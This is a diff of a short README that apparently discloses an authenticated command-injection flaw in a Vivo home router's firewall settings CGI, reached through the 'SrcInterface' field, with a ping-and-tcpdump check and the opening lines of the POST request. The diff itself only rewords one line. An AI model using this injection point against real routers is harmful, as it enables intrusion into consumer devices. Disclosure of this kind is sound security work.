peritocibernetico/VivoCodeExecutionFirewall/README.md

 Vivo brazilian router is vulnerable to a authenticated remote code execution in the firewall settings page.<br>
 The "SrcInterface" was tested and it is vulnerable.<br>
 It is possible to run a ping command in the router.<br>
-Run a tcpdump in the other end and see the packets being received.<br>
+Run tcpdump in the other end and see the packets being received.<br>

 POST /cgi-bin/settings-firewall.cgi HTTP/1.1<br>
 Host: 192.168.15.1<br>